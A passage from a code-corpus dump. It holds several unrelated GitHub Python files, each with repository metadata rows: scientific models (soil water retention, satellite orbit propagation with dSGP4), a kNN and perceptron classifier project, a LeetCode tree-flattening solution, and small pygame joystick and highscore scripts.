print('Methylated Cs in introns (of total CpGs in introns): ', round(cpg_in_intron_perc, 2), '%')
print('Methylated Cs in UTRs (of total CpGs in UTRs): ', round(cpg_in_utr_perc, 2), '%\n')
print('Methylated Cs in exons (of total methylated CpGs in genes): ', round(exon_meth_perc, 2), '%')
print('Methylated Cs in introns (of total methylated CpGs in genes): ', round(intron_meth_perc, 2), '%')
print('Methylated Cs in UTRs (of total methylated CpGs in genes): ', round(utr_meth_perc, 2), '%\n')
print('Methylated Cs with ambiguous annotation (of total CpGs): ', round(ambig_meth_perc, 2), '%')
|
MCH74/Mnat_Methylation
|
scripts/analyse_all_C_methcalls.py
|
analyse_all_C_methcalls.py
|
py
| 5,327 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43085015911
|
import numpy as np
class BrooksCorey(object):
def __init__( self, lambd=0., alpha=0., sr=0.0, smoothing_interval=0. ):
self._lambda = lambd
self._alpha = alpha
self._sr = sr
self._pc0 = smoothing_interval
self._factor = -2.0 - (0.5 + 2.0) * self._lambda;
self._pc_bubble = 1.0 / self._alpha
if self._pc0 > 0.:
k0 = self.k_relative(self._pc0) - 1.
k0p = self.d_k_relative(self._pc0)
self._a = (3 * k0 - k0p * self._pc0) / (self._pc0**2)
self._b = (k0p * self._pc0 - 2 * k0) / (self._pc0**3)
def capillaryPressure( self, s ):
se = (s - self._sr) / (1.0 - self._sr)
se = min(se, 1.0);
return pow(se, -1.0/self._lambda) / self._alpha
def d_capillaryPressure( self, s ):
se = (s - self._sr) / (1.0 - self._sr)
se = min(se, 1.0);
return -1. / self._lambda * pow(se, -1.0/self._lambda - 1.) / self._alpha / (1. - self._sr);
def saturation( self, pc ):
if pc > self._pc_bubble:
return pow(self._alpha * pc, -self._lambda) * (1.0 - self._sr) + self._sr
else:
return 1.0;
def d_saturation( self, pc ):
if pc > self._pc_bubble:
return -pow(self._alpha * pc, -self._lambda - 1.0) * (1.0 - self._sr) * self._alpha * self._lambda
else:
return 0.
def k_relative( self, pc ):
if pc <= self._pc_bubble:
return 1.0
elif pc >= self._pc0:
return pow(self._alpha * pc, self._factor)
else:
dpc = pc - self._pc_bubble
return 1.0 + self._a * dpc**2 + self._b * dpc**3
def d_k_relative( self, pc ):
if pc <= self._pc_bubble:
return 0.
elif pc >= self._pc0:
return self._factor * self._alpha * pow(self._alpha * pc, self._factor - 1.0)
else:
dpc = pc - self._pc_bubble
return self._a * 2 * dpc + self._b * 3 * dpc**2
|
amanzi/ats
|
tools/python_models/wrm_brookscorey.py
|
wrm_brookscorey.py
|
py
| 2,012 |
python
|
en
|
code
| 35 |
github-code
|
6
|
24860820161
|
# -*- coding: utf-8 -*-
"""
Mini project 1
Dennis Brown, COMP6636, 03 MAR 2021
"""
import numpy as np
import copy
import matplotlib.pyplot as plt
def libsvm_scale_import(filename):
"""
Read data from a libsvm .scale file
"""
datafile = open(filename, 'r')
# First pass: get dimensions of data
num_samples = 0
max_feature_id = 0
for line in datafile:
num_samples += 1
tokens = line.split()
for feature in tokens[1:]:
feature_id = int(feature.split(':')[0])
max_feature_id = max(feature_id, max_feature_id)
# Second pass: read data into array
data = np.zeros((num_samples, max_feature_id + 1))
curr_sample = 0
datafile.seek(0)
for line in datafile:
tokens = line.split()
data[curr_sample][0] = float(tokens[0])
for feature in tokens[1:]:
feature_id = int(feature.split(':')[0])
feature_val = float(feature.split(':')[1])
data[curr_sample][feature_id] = feature_val
curr_sample += 1
datafile.close()
print('LOADED:', filename, ':', data.shape)
return data
def get_neighbors(data, test_sample, num_neighbors):
"""
Given training data, a test sample, and a number of
neighbors, return the closest neighbors.
"""
# Calculate all distances from the training samples
# to this test sample. Collect index, distance into a list.
indices_and_distances = list()
for i in range(len(data)):
dist = np.linalg.norm(test_sample[1:] - (data[i])[1:]) # leave out classification at pos 0
indices_and_distances.append([i, dist])
# Sort list by distance
indices_and_distances.sort(key=lambda _: _[1])
# Make a list of requested number of closest neighbors from sorted
# list of indices+distances
neighbors = list()
for i in range(num_neighbors):
neighbors.append(indices_and_distances[i][0])
return neighbors
def classify_one_sample(data, test_sample, num_neighbors):
"""
Given training data, a test sample, and a number of neighbors,
predict which classification the test sample belongs to.
"""
# Get closest neighbors
neighbors = get_neighbors(data, test_sample, num_neighbors)
# Create list of classifications of the neighbors
classifications = list()
for i in range(len(neighbors)):
classifications.append(data[neighbors[i]][0]) # 0 = classification
# Return the most common classification of the neighbors
prediction = max(set(classifications), key = classifications.count)
return prediction
def k_nearest_neighbors(data, test_samples, num_neighbors):
"""
Given sample data (samples are rows, columns
features, and samples have classifications in position 0),
test data, and a number of neighbors, predict which classification
each test sample belongs to.
"""
classifications = list()
for i in range(len(test_samples)):
output = classify_one_sample(data, test_samples[i], num_neighbors)
classifications.append(output)
if ((i % 20) == 0):
print('\rknn test sample', i, end='')
print()
return(classifications)
def check_knn_classifications(y, y_hat):
"""
Given actual values y and classiciations y_hat,
return the number of errors
"""
errors = 0
for i in range(len(y)):
if (y[i] != y_hat[i]):
errors += 1
return errors
def train_perceptron(data, beta, step_limit):
"""
Perceptron. Given a set of data (samples are rows, columns
features, and samples have classifications in position 0),
a step size (beta), and a step limit, train and return a
weight vector that can be used to classify the given data.
"""
# Initialize the weight vector including bias element
w = np.zeros(len(data[0]))
# Initialize y_hat
y_hat = np.zeros(len(data))
# Slice off y
y = data[:,0]
# Repeat the main loop until we have convergence or reach the
# iteration limit
steps = 0
converged = False
while(not(converged) and (steps < step_limit)):
converged = True
# For each sample in the data, calculate w's classification error
# and update w.
for i in range(len(data)):
# Replace classification in sample[0] with a 1 to allow
# for a biased weight vector
biased_sample = np.copy(data[i])
biased_sample[0] = 1
# Get prediction and error, then update weight vector
y_hat[i] = 1 if (np.matmul(w.T, biased_sample) > 0) else -1
error = y[i] - y_hat[i]
w += biased_sample * error * beta
steps += 1
# If error on this element is > a very small value, we have
# not converged.
if (abs(error) > 0.000001):
converged = False
print('Perceptron:' ,steps, 'steps; converged?', converged)
return w
def multiclass_train_perceptron(data, beta, step_limit):
"""
Perceptron. Given a set of data (samples are rows, columns
features, and samples have classifications in position 0),
a step size (beta), and a step limit, train and return a
weight vector that can be used to classify the given data.
This version works on data with multiple classes by one-vs-rest.
"""
# Find unique classes
classes = []
for i in range(data.shape[0]):
if (not(data[i][0] in classes)):
classes.append(data[i][0])
# For each classification, train perceptron on current class vs.
# rest of the untrained classes.
ws = []
curr_data = copy.deepcopy(data)
for curr_class in range(len(classes)):
# Save original classification data
orig_classes = copy.deepcopy(curr_data[:,0])
# Reset classification data to 1 (for current class) or -1 for other
for i in range(curr_data.shape[0]):
if (curr_data[i][0] == classes[curr_class]):
curr_data[i][0] = 1
else:
curr_data[i][0] = -1
# Train and find weights
ws.append(train_perceptron(curr_data, beta, step_limit))
# Put original classifications back
for i in range(curr_data.shape[0]):
curr_data[i][0] = orig_classes[i]
return ws
def test_perceptron(data, w):
"""
Given test data and a weight vector w, return number of
num_misclass when classifying the test data using the
weights.
"""
errors = 0
# Initialize y_hat
y_hat = np.zeros(len(data))
# Slice off y
y = data[:,0]
# Determine how weights classify each test sample and count
# num_misclass
for i in range(len(data)):
biased_sample = np.copy(data[i])
biased_sample[0] = 1
y_hat[i] = 1 if (np.matmul(w.T, biased_sample) > 0) else -1
if (y[i] != y_hat[i]):
errors += 1
return errors
def multiclass_test_perceptron(data, ws):
"""
Given test data and a weight vector w, return number of
num_misclass when classifying the test data using the
weights.
This version works on data with multiple classes by One vs. All (OVA).
"""
# Find unique classes
classes = []
for i in range(data.shape[0]):
if (not(data[i][0] in classes)):
classes.append(data[i][0])
# For each classification, test perceptron on current class vs.
# rest of the untested classes.
errors = []
curr_data = copy.deepcopy(data)
for curr_class in range(len(classes)):
# Save original classification data
orig_classes = copy.deepcopy(curr_data[:,0])
# Reset classification data to 1 (for current class) or -1 for other
for i in range(curr_data.shape[0]):
if (curr_data[i][0] == classes[curr_class]):
curr_data[i][0] = 1
else:
curr_data[i][0] = -1
# Train and find weights
errors.append(test_perceptron(curr_data, ws[curr_class]))
# Put original classifications back
for i in range(curr_data.shape[0]):
curr_data[i][0] = orig_classes[i]
return errors
def iris_knn():
"""
Run kNN on the iris dataset for the various numbers of neighbors.
"""
print("----------\niris kNN")
# Load data
data = libsvm_scale_import('data/iris.scale')
# Shuffle the data because we want to split it into train & test,
# and it is pre-sorted (we would test against classes we didn't
# see in training)
np.random.seed(1) # ensure consistent shuffling
np.random.shuffle(data)
# Split up data into training and test data based on split value
split = 50
train_data = data[:split]
test_data = data[split:]
# Test multiple values of k
test_ks = np.arange(1, split)
error_rates = np.zeros(test_ks.shape[0])
for i in range(len(test_ks)):
# Classify the test data
print('Classify with k =', test_ks[i])
classifications = k_nearest_neighbors(train_data, test_data,
test_ks[i])
# Check accuracy
errors = check_knn_classifications(test_data[:,0], classifications)
error_rates[i] = errors / test_data.shape[0]
print(errors, 'errors in', test_data.shape[0], 'samples')
print('ks:', test_ks)
print('error rates:', error_rates)
plt.clf()
plt.plot(test_ks, error_rates, marker='.')
plt.title('Iris kNN: error rate vs. k')
plt.xlabel('k')
plt.ylabel('error rate')
plt.xlim(left = 0)
plt.ylim(bottom = 0)
plt.grid(True)
plt.savefig('iris_knn.png', dpi = 600)
def iris_perceptron():
"""
Run Perceptron on the iris dataset in various ways.
"""
print("----------\niris Perceptron")
# Load data
data = libsvm_scale_import('data/iris.scale')
# Shuffle the data because we want to split it into train & test,
# and it is pre-sorted (we would test against classes we didn't
# see in training)
np.random.seed(1) # ensure consistent shuffling
np.random.shuffle(data)
# Split up data into training and test data based on split value
split = 50
train_data = data[:split]
test_data = data[split:]
# Perform multi-class training and test and collect
# a weight vector and number of errors for each class
ws = multiclass_train_perceptron(train_data, 0.1, 100000)
errors = multiclass_test_perceptron(test_data, ws)
# Report errors
print(errors, 'errors in', test_data.shape[0], 'samples')
# Show sorted weights for every class
for i in range(len(ws)):
# Sort weights to find most important
w = list(ws[i][1:])
feature_ids = range(1, len(w) + 1)
print('W:', w)
labels = []
for id in feature_ids:
labels.append(str(int(id)))
# Report top weights
plt.clf()
plt.bar(labels, w)
plt.title('iris Perceptron: feature weights for class = ' + str(i+1))
plt.xlabel('feature ID')
plt.ylabel('weight')
plt.grid(True)
plt.savefig('iris_weights' + str(i+1) + '.png', dpi = 600)
def a4a_knn():
"""
Run kNN on the a4a dataset for various numbers of neighbors.
"""
print("----------\na4a kNN")
# Load data
train_data = libsvm_scale_import('data/a4a')
test_data = libsvm_scale_import('data/a4a.t')
# Training data has 1 fewer feature than test data, so add a column
# of zeros to it so samples have same number of features in train and test
zero_col = np.zeros((len(train_data), 1))
train_data = np.hstack((train_data, zero_col))
# Test multiple values of k
# This takes over 3 hours to run on my fastest computer.
test_ks = np.array([1, 3, 5, 11, 21, 31, 41, 51, 61, 71, 81, 91, 101, 201, 301, 401, 501, 601, 701, 801, 901, 1001])
error_rates = np.zeros(len(test_ks))
for i in range(len(test_ks)):
print('Classify with k =', test_ks[i])
# Classify the test data
classifications = k_nearest_neighbors(train_data, test_data,
test_ks[i])
# Check accuracy
errors = check_knn_classifications(test_data[:,0], classifications)
error_rates[i] = errors / test_data.shape[0]
print(errors, 'errors in', test_data.shape[0], 'samples')
print('ks:', test_ks)
print('error rates:', error_rates)
plt.clf()
plt.plot(test_ks, error_rates, marker='.')
plt.title('a4a kNN: error rate vs. k')
plt.xlabel('k')
plt.ylabel('error rate')
plt.xlim(left = 0)
plt.ylim(bottom = 0)
plt.grid(True)
plt.savefig('a4a_knn.png', dpi = 600)
def a4a_perceptron():
"""
Run Perceptron on the a4a dataset in various ways.
"""
print("----------\na4a Perceptron")
# Load data
train_data = libsvm_scale_import('data/a4a')
test_data = libsvm_scale_import('data/a4a.t')
# Training data has 1 fewer feature than test data, so add a column
# of zeros to it so samples have same number of features in train and test
zero_col = np.zeros((len(train_data), 1))
train_data = np.hstack((train_data, zero_col))
# Test multiple values of beta
test_betas = np.array([0.0001, 0.001, 0.01, 0.1, 1.0, 10.0, 100.0])
error_rates = np.zeros(test_betas.shape[0])
ws = []
best_beta = -1
best_error_rate = 999999
for i in range(len(test_betas)):
print('Classify with beta =', test_betas[i])
# Train and find weights
ws.append(train_perceptron(train_data, test_betas[i], 100000))
# Check accuracy
errors = test_perceptron(test_data, ws[i])
error_rates[i] = errors / test_data.shape[0]
if (error_rates[i] < best_error_rate):
best_error_rate = error_rates[i]
best_beta = i
print(errors, 'errors in', test_data.shape[0], 'samples')
# Report error rates
print('betas:', test_betas)
print('error rates:', error_rates)
plt.clf()
plt.plot(test_betas, error_rates, marker='.')
plt.title('a4a Perceptron: error rate vs. step size for 100000 iterations')
plt.xscale('log')
plt.xlabel('step size')
plt.ylabel('error rate')
plt.ylim(bottom = 0)
plt.grid(True)
plt.savefig('a4a_perceptron.png', dpi = 600)
# Sort weights to find most important
w = list(ws[best_beta][1:])
feature_ids = range(1, len(w) + 1)
bar_data = list(zip(feature_ids, w))
bar_data.sort(key = lambda _: abs(_[1]), reverse = True)
bar_data = np.array(bar_data[:20])
labels = []
for id in bar_data[:,0]:
labels.append(str(int(id)))
# Report top weights
plt.clf()
plt.bar(labels, bar_data[:,1])
plt.title('a4a Perceptron: 20 most important features')
plt.xlabel('feature ID')
plt.ylabel('weight')
plt.grid(True)
plt.savefig('a4a_weights.png', dpi = 600)
def main():
iris_knn()
iris_perceptron()
a4a_knn()
a4a_perceptron()
if __name__ == '__main__':
main()
|
dennisgbrown/classifiers-decision-trees-kNN-perceptron
|
MiniProj1.py
|
MiniProj1.py
|
py
| 15,120 |
python
|
en
|
code
| 0 |
github-code
|
6
|
41137173523
|
#to run, 'sudo python' then 'import gamepad' (this file), then 'gamepad.test()'
#to install pygame: apt-get install python-pygame
import pygame, time, serial, csv, motor_func, math
pygame.init()
j = pygame.joystick.Joystick(0)
j.init()
# This is for the output write (change it accordingly, i.e: /dev/ttyUSB0):
#output_ser_path = raw_input("Please enter your serial port number: ")
output_delay = 0.1
"""
for i in range(10):
try:
output_ser_path = str(i)
except Exception:
pass
print(output_ser_path)
ser = serial.Serial("Port_#0002.Hub_#0004")
ser.baudrate = 9600
ser.write('Initialized Joystick : %s' % j.get_name())
print('Initialized Joystick : %s' % j.get_name())
ser.timeout = 1
"""
def get():
out = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
it = 0 #iterator
pygame.event.pump()
#Read input from the two joysticks
for i in range(0, j.get_numaxes()):
out[it] = round(j.get_axis(i), 2)
it+=1
#Read input from buttons
for i in range(0, j.get_numbuttons()):
#print (j.get_numbuttons())
out[it] = j.get_button(i)
it+=1
return out
for i in range(0, j.get_numhats()):
out[it] = j.get_hat(i)
it+=1
return out
def test():
while True:
time.sleep(float(output_delay))
joystick_info = get()
print (joystick_info)
#ser.write(str(joystick_info))
#def motor_move(motor, speed_fb,speed_lr,ser)
# motor_func.motor_move(1,joystick_info[1]*0.5*(joystick_info[3] + 1),joystick_info[0]*0.5*(joystick_info[3] + 1),joystick_info[2]*0.5*(joystick_info[3] + 1),ser)
# motor_func.motor_move(2,joystick_info[1]*0.5*(joystick_info[3] + 1),joystick_info[0]*0.5*(joystick_info[3] + 1),joystick_info[2]*0.5*(joystick_info[3] + 1),ser)
if __name__ == '__main__':
test()
|
rsx-utoronto/galaxy
|
ground_station/main_ui/joystick.py
|
joystick.py
|
py
| 1,815 |
python
|
en
|
code
| 1 |
github-code
|
6
|
2772802336
|
# Given a binary tree, flatten it to a linked list in-place.
# For example, given the following tree:
# 1
# / \
# 2 5
# / \ \
# 3 4 6
# The flattened tree should look like:
# 1
# \
# 2
# \
# 3
# \
# 4
# \
# 5
# \
# 6
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def flatten(self, root: TreeNode) -> None:
"""
Do not return anything, modify root in-place instead.
"""
#http://www.cnblogs.com/grandyang/p/4293853.html
# 思路是先利用DFS的思路找到最左子节点,然后回到其父节点,
# 把其父节点和右子节点断开,将原左子结点连上父节点的右子节点上,
# 然后再把原右子节点连到新右子节点的右子节点上,
# 然后再回到上一父节点做相同操作。
if root == None:
return
if root.left!=None:
self.flatten(root.left)
if root.right!=None:
self.flatten(root.right)
temp = root.right
root.right = root.left
root.left = None
while(root.right!=None):
root = root.right
root.right = temp
def flatten1(self,root)->None:
# 非递归
cur = root
while(cur!=None):
if cur.left:
p = cur.left
while(p.right):
p = p.right
p.right = cur.right
cur.right = cur.left
cur.left = None
cur = cur.right
|
queryor/algorithms
|
leetcode/114. Flatten Binary Tree to Linked List.py
|
114. Flatten Binary Tree to Linked List.py
|
py
| 1,688 |
python
|
en
|
code
| 0 |
github-code
|
6
|
777182916
|
import datetime
import numpy as np
import torch
def get_gravity_constants(gravity_constant_name):
if gravity_constant_name == 'wgs-72old':
mu = 398600.79964 # in km3 / s2
radiusearthkm = 6378.135 # km
xke = 0.0743669161
tumin = 1.0 / xke
j2 = 0.001082616
j3 = -0.00000253881
j4 = -0.00000165597
j3oj2 = j3 / j2
elif gravity_constant_name == 'wgs-72':
mu = 398600.8 # in km3 / s2
radiusearthkm = 6378.135 # km
xke = 60.0 / np.sqrt(radiusearthkm*radiusearthkm*radiusearthkm/mu)
tumin = 1.0 / xke
j2 = 0.001082616
j3 = -0.00000253881
j4 = -0.00000165597
j3oj2 = j3 / j2
elif gravity_constant_name=="wgs-84":
mu = 398600.5 # in km3 / s2
radiusearthkm = 6378.137 # km
xke = 60.0 / np.sqrt(radiusearthkm*radiusearthkm*radiusearthkm/mu)
tumin = 1.0 / xke
j2 = 0.00108262998905
j3 = -0.00000253215306
j4 = -0.00000161098761
j3oj2 = j3 / j2
else:
raise RuntimeError("Supported gravity constant names: wgs-72, wgs-84, wgs-72old while "+gravity_constant_name+" was provided")
return torch.tensor(tumin), torch.tensor(mu), torch.tensor(radiusearthkm), torch.tensor(xke), torch.tensor(j2), torch.tensor(j3), torch.tensor(j4), torch.tensor(j3oj2)
def propagate(x, tle_sat, tsince, gravity_constant_name="wgs-84"):
"""
This function takes a tensor of inputs and a TLE, and returns the corresponding state.
It can be used to take the gradient of the state w.r.t. the inputs.
Args:
- x (``torch.tensor``): input of tensors, with the following values (x[0:9] have the same units as the ones in the TLE):
- x[0]: bstar
- x[1]: ndot
- x[2]: nddot
- x[3]: ecco
- x[4]: argpo
- x[5]: inclo
- x[6]: mo
- x[7]: kozai
- x[8]: nodeo
- tle_sat (``dsgp4.tle.TLE``): TLE object to be propagated
- tsince (``float``): propagation time in minutes
Returns:
- state (``torch.tensor``): (2x3) tensor representing position and velocity in km and km/s.
"""
from .sgp4init import sgp4init
from .sgp4 import sgp4
whichconst=get_gravity_constants(gravity_constant_name)
sgp4init(whichconst=whichconst,
opsmode='i',
satn=tle_sat.satellite_catalog_number,
epoch=(tle_sat._jdsatepoch+tle_sat._jdsatepochF)-2433281.5,
xbstar=x[0],
xndot=x[1],
xnddot=x[2],
xecco=x[3],
xargpo=x[4],
xinclo=x[5],
xmo=x[6],
xno_kozai=x[7],
xnodeo=x[8],
satellite=tle_sat)
state=sgp4(tle_sat, tsince*torch.ones(1,1))
return state
def from_year_day_to_date(y,d):
return (datetime.datetime(y, 1, 1) + datetime.timedelta(d - 1))
def gstime(jdut1):
deg2rad=np.pi/180.
tut1 = (jdut1 - 2451545.0) / 36525.0
temp = -6.2e-6* tut1 * tut1 * tut1 + 0.093104 * tut1 * tut1 + \
(876600.0*3600 + 8640184.812866) * tut1 + 67310.54841 # sec
temp = (temp*(np.pi/180.0) / 240.0) % (2*np.pi) # 360/86400 = 1/240, to deg, to rad
# ------------------------ check quadrants ---------------------
temp=torch.where(temp<0., temp+(2*np.pi), temp)
return temp
def clone_w_grad(y):
return y.clone().detach().requires_grad_(True)
def jday(year, mon, day, hr, minute, sec):
"""
Converts a date and time to a Julian Date. The Julian Date is the number of days since noon on January 1st, 4713 BC.
Args:
year (`int`): year
mon (`int`): month
day (`int`): day
hr (`int`): hour
minute (`int`): minute
sec (`float`): second
Returns:
`float`: Julian Date
"""
jd=(367.0 * year -
7.0 * (year + ((mon + 9.0) // 12.0)) * 0.25 // 1.0 +
275.0 * mon // 9.0 +
day + 1721013.5)
fr=(sec + minute * 60.0 + hr * 3600.0) / 86400.0
return jd,fr
def invjday(jd):
"""
Converts a Julian Date to a date and time. The Julian Date is the number of days since noon on January 1st, 4713 BC.
Args:
jd (`float`): Julian Date
Returns:
`tuple`: (year, month, day, hour, minute, second)
"""
temp = jd - 2415019.5
tu = temp / 365.25
year = 1900 + int(tu // 1.0)
leapyrs = int(((year - 1901) * 0.25) // 1.0)
days = temp - ((year - 1900) * 365.0 + leapyrs) + 0.00000000001
if (days < 1.0):
year = year - 1
leapyrs = int(((year - 1901) * 0.25) // 1.0)
days = temp - ((year - 1900) * 365.0 + leapyrs)
mon, day, hr, minute, sec = days2mdhms(year, days)
sec = sec - 0.00000086400
return year, mon, day, hr, minute, sec
def days2mdhms(year, fractional_day):
"""
Converts a number of days to months, days, hours, minutes, and seconds.
Args:
year (`int`): year
fractional_day (`float`): number of days
Returns:
`tuple`: (month, day, hour, minute, second)
"""
d=datetime.timedelta(days=fractional_day)
datetime_obj=datetime.datetime(year-1,12,31)+d
return datetime_obj.month, datetime_obj.day, datetime_obj.hour, datetime_obj.minute, datetime_obj.second+datetime_obj.microsecond/1e6
def from_string_to_datetime(string):
"""
Converts a string to a datetime object.
Args:
string (`str`): string to convert
Returns:
`datetime.datetime`: datetime object
"""
if string.find('.')!=-1:
return datetime.datetime.strptime(string, '%Y-%m-%d %H:%M:%S.%f')
else:
return datetime.datetime.strptime(string, '%Y-%m-%d %H:%M:%S')
def from_mjd_to_epoch_days_after_1_jan(mjd_date):
"""
Converts a Modified Julian Date to the number of days after 1 Jan 2000.
Args:
mjd_date (`float`): Modified Julian Date
Returns:
`float`: number of days after 1 Jan 2000
"""
d = from_mjd_to_datetime(mjd_date)
dd = d - datetime.datetime(d.year-1, 12, 31)
days = dd.days
days_fraction = (dd.seconds + dd.microseconds/1e6) / (60*60*24)
return days + days_fraction
def from_mjd_to_datetime(mjd_date):
"""
Converts a Modified Julian Date to a datetime object. The Modified Julian Date is the number of days since midnight on November 17, 1858.
Args:
mjd_date (`float`): Modified Julian Date
Returns:
`datetime.datetime`: datetime object
"""
jd_date=mjd_date+2400000.5
return from_jd_to_datetime(jd_date)
def from_jd_to_datetime(jd_date):
"""
Converts a Julian Date to a datetime object. The Julian Date is the number of days since noon on January 1st, 4713 BC.
Args:
jd_date (`float`): Julian Date
Returns:
`datetime.datetime`: datetime object
"""
year, month, day, hour, minute, seconds=invjday(jd_date)
e_1=datetime.datetime(year=int(year), month=int(month), day=int(day), hour=int(hour), minute=int(minute), second=0)
return e_1+datetime.timedelta(seconds=seconds)
def get_non_empty_lines(lines):
"""
This function returns the non-empty lines of a list of lines.
Args:
lines (`list`): list of lines
Returns:
`list`: non-empty lines
"""
if not isinstance(lines, str):
raise ValueError('Expecting a string')
lines = lines.splitlines()
lines = [line for line in lines if line.strip()]
return lines
def from_datetime_to_fractional_day(datetime_object):
"""
Converts a datetime object to a fractional day. The fractional day is the number of days since the beginning of the year. For example, January 1st is 0.0, January 2nd is 1.0, etc.
Args:
datetime_object (`datetime.datetime`): datetime object to convert
Returns:
`float`: fractional day
"""
d = datetime_object-datetime.datetime(datetime_object.year-1, 12, 31)
fractional_day = d.days + d.seconds/60./60./24 + d.microseconds/60./60./24./1e6
return fractional_day
def from_datetime_to_mjd(datetime_obj):
"""
Converts a datetime object to a Modified Julian Date. The Modified Julian Date is the number of days since midnight on November 17, 1858.
Args:
datetime_obj (`datetime.datetime`): datetime object to convert
Returns:
`float`: Modified Julian Date
"""
return from_datetime_to_jd(datetime_obj)-2400000.5
def from_datetime_to_jd(datetime_obj):
"""
Converts a datetime object to a Julian Date. The Julian Date is the number of days since noon on January 1, 4713 BC.
Args:
datetime_obj (`datetime.datetime`): datetime object to convert
Returns:
`float`: Julian Date
"""
return sum(jday(year=datetime_obj.year, mon=datetime_obj.month, day=datetime_obj.day, hr=datetime_obj.hour, minute=datetime_obj.minute, sec=datetime_obj.second+float('0.'+str(datetime_obj.microsecond))))
def from_cartesian_to_tle_elements(state, gravity_constant_name='wgs-72'):
"""
This function converts the provided state from Cartesian to TLE elements.
Args:
state (`np.ndarray`): state to convert
gravity_constant_name (`str`): name of the central body (default: 'wgs-72')
Returns:
tuple: tuple containing: - `float`: semi-major axis - `float`: eccentricity - `float`: inclination - `float`: right ascension of the ascending node - `float`: argument of perigee - `float`: mean anomaly
"""
_,mu_earth,_,_,_,_,_,_=get_gravity_constants(gravity_constant_name)
mu_earth=float(mu_earth)*1e9
kepl_el = from_cartesian_to_keplerian(state, mu_earth)
tle_elements={}
tle_elements['mean_motion'] = np.sqrt(mu_earth/((kepl_el[0])**(3.0)))
tle_elements['eccentricity'] = kepl_el[1]
tle_elements['inclination'] = kepl_el[2]
tle_elements['raan'] = kepl_el[3]
tle_elements['argument_of_perigee'] = kepl_el[4]
mean_anomaly = kepl_el[5] - kepl_el[1]*np.sin(kepl_el[5])
tle_elements['mean_anomaly'] = mean_anomaly%(2*np.pi)
return tle_elements
def from_cartesian_to_keplerian(state, mu):
"""
This function takes the state in cartesian coordinates and the gravitational
parameter of the central body, and returns the state in Keplerian elements.
Args:
state (`np.array`): numpy array of 2 rows and 3 columns, where
the first row represents position, and the second velocity.
mu (`float`): gravitational parameter of the central body
Returns:
`np.array`: numpy array of the six keplerian elements: (a,e,i,omega,Omega,mean_anomaly)
(i.e., semi major axis, eccentricity, inclination,
right ascension of ascending node, argument of perigee,
mean anomaly). All the angles are in radiants, eccentricity is unitless
and semi major axis is in SI.
"""
h_bar = np.cross(np.array([state[0,0], state[0,1], state[0,2]]), np.array([state[1,0], state[1,1], state[1,2]]))
h = np.linalg.norm(h_bar)
r = np.linalg.norm(np.array([state[0,0], state[0,1], state[0,2]]))
v = np.linalg.norm(np.array([state[1,0], state[1,1], state[1,2]]))
E = 0.5*(v**2)-mu/r
a = -mu/(2*E)
e = np.sqrt(1-(h**2)/(a*mu))
i = np.arccos(h_bar[2]/h)
Omega = np.arctan2(h_bar[0],-h_bar[1])
lat = np.arctan2(np.divide(state[0,2],(np.sin(i))), (state[0,0]*np.cos(Omega) + state[0,1]*np.sin(Omega)))
p = a*(1-e**2)
nu = np.arctan2(np.sqrt(p/mu)*np.dot(np.array([state[0,0], state[0,1], state[0,2]]),np.array([state[1,0], state[1,1], state[1,2]])), p-r)
omega = (lat-nu)
eccentric_anomaly = 2*np.arctan(np.sqrt((1-e)/(1+e))*np.tan(nu/2))
n = np.sqrt(mu/(a**3))
mean_anomaly=eccentric_anomaly-e*np.sin(eccentric_anomaly)
#I make sure they are always in 0,2pi
if mean_anomaly<0:
mean_anomaly = 2*np.pi-abs(mean_anomaly)
if omega<0:
omega=2*np.pi-abs(omega)
if Omega<0:
Omega=2*np.pi-abs(Omega)
if abs(mean_anomaly)>2*np.pi:
mean_anomaly=mean_anomaly%(2*np.pi)
if abs(omega)>2*np.pi:
omega=omega%(2*np.pi)
if abs(Omega)>2*np.pi:
Omega=Omega%(2*np.pi)
return np.array([a, e, i, Omega, omega, mean_anomaly])
def from_cartesian_to_keplerian_torch(state, mu):
"""
Same as from_cartesian_to_keplerian, but for torch tensors.
Args:
state (`np.array`): numpy array of 2 rows and 3 columns, where
the first row represents position, and the second velocity.
mu (`float`): gravitational parameter of the central body
Returns:
`np.array`: numpy array of the six keplerian elements: (a,e,i,omega,Omega,mean_anomaly)
(i.e., semi major axis, eccentricity, inclination,
right ascension of ascending node, argument of perigee,
mean anomaly). All the angles are in radiants, eccentricity is unitless
and semi major axis is in SI.
"""
h_bar = torch.cross(state[0], state[1])
h = h_bar.norm()
r = state[0].norm()
v = torch.norm(state[1])
E = 0.5*(v**2)-mu/r
a = -mu/(2*E)
e = torch.sqrt(1-(h**2)/(a*mu))
i = torch.arccos(h_bar[2]/h)
Omega = torch.arctan2(h_bar[0],-h_bar[1])
lat = torch.arctan2(torch.divide(state[0,2],(torch.sin(i))), (state[0,0]*torch.cos(Omega) + state[0,1]*torch.sin(Omega)))
p = a*(1-e**2)
nu = torch.arctan2(torch.sqrt(p/mu)*torch.dot(state[0],state[1]), p-r)
omega = (lat-nu)
eccentric_anomaly = 2*torch.arctan(torch.sqrt((1-e)/(1+e))*torch.tan(nu/2))
n = torch.sqrt(mu/(a**3))
mean_anomaly=eccentric_anomaly-e*torch.sin(eccentric_anomaly)
#I make sure they are always in 0,2pi
mean_motion=torch.sqrt(mu/((a)**(3.0)))
xpdotp = 1440.0 / (2.0 *np.pi)
no_kozai_conversion_factor=xpdotp/43200.0* np.pi
no_kozai=mean_motion/no_kozai_conversion_factor
return [no_kozai, e, i, Omega, omega, mean_anomaly]
|
esa/dSGP4
|
dsgp4/util.py
|
util.py
|
py
| 14,817 |
python
|
en
|
code
| 1 |
github-code
|
6
|
45364274546
|
import pygame
from Game.Scenes.Scene import *
from Game.Shared import GameConstant
from Game import Highscore
class HighscoreScene(Scene):
def __init__(self, game):
super(HighscoreScene, self).__init__(game)
self.__highScoreSprite = pygame.transform.scale(pygame.image.load(GameConstant.SPRITE_HIGHSCORE) , (276,164))
def render(self):
self.getGame().screen.blit(self.__highScoreSprite , (50 , 50))
self.clearText()
highscore = Highscore()
x = 350
y = 100
for score in highscore.getScores():
self.addText(score[0] , x , y , size = 30)
self.addText(str(score[1]) , x + 200 , y , size = 30)
y+=30
self.addText("Press F1 to start The Game" , 50 , 300 , size = 30)
super(HighscoreScene, self).render()
def handleEvents(self , events):
super(HighscoreScene,self).handleEvents(events)
for event in events:
keys = pygame.key.get_pressed()
